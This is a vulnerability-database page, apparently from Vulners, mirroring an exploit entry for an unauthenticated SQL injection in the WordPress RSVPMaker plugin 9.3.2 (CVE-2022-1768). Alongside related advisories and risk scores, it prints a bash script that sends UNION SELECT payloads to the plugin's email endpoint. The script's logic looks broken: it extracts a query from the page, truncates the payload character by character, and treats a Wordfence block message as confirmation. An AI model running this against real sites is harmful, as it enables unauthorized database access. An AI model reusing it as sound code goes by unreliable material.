Lucene search
K

WordPress RSVPMaker 9.3.2 SQL Injection Vulnerability

🗓️ 15 Jan 2024 00:00:00Reported by Amirhossein BahramizadehType 
zdt
 zdt
🔗 0day.today👁 300 Views

Identifying SQL Injection vulnerability in WordPress RSVPMaker plugi

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2022-1768
26 Jan 202500:00
circl
CNNVD
WordPress plugin RSVPMaker SQL注入漏洞
13 Jun 202200:00
cnnvd
CNVD
WordPress plugin RSVPMaker SQL注入漏洞
15 Jun 202200:00
cnvd
CVE
CVE-2022-1768
13 Jun 202213:08
cve
Cvelist
CVE-2022-1768 RSVPMaker <= 9.3.2 - Unauthenticated SQL Injection
13 Jun 202213:08
cvelist
Nuclei
WordPress RSVPMaker <=9.3.2 - SQL Injection
7 Jun 202603:02
nuclei
NVD
CVE-2022-1768
13 Jun 202214:15
nvd
OSV
CVE-2022-1768
13 Jun 202214:15
osv
Packet Storm
WordPress RSVPMaker 9.3.2 SQL Injection
15 Jan 202400:00
packetstorm
Patchstack
WordPress RSVPMaker plugin <= 9.3.2 - Unauthenticated SQL Injection (SQLi) vulnerability
17 May 202200:00
patchstack
Rows per page
#!/bin/bash

# Set the URL of the website running the vulnerable plugin
url="http://example.com/wp-content/plugins/rsvpmaker/rsvpmaker-email.php"

# Set the number of columns in the query
columns=5

response=$(curl -s "$url")
query=$(echo "$response" | grep -oP 'FROM .* WHERE .*')

payload="' UNION SELECT 1,2,3,4,5-- "

# Test the query with different numbers of columns
for i in $(seq 1 $columns)
do
  query_with_payload="${query%?*}?${payload:0:i}${query#*?}"
  curl -s -X POST -d "$query_with_payload" "$url" | grep -q "Wordfence Security Error"
  if [ $? -eq 0 ]
  then
    echo "Vulnerability confirmed with $i columns"
    break
  fi
done

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

15 Jan 2024 00:00Current
7.7High risk
Vulners AI Score7.7
CVSS 3.17.5 - 9.8
CVSS 25
EPSS0.86134
SSVC
300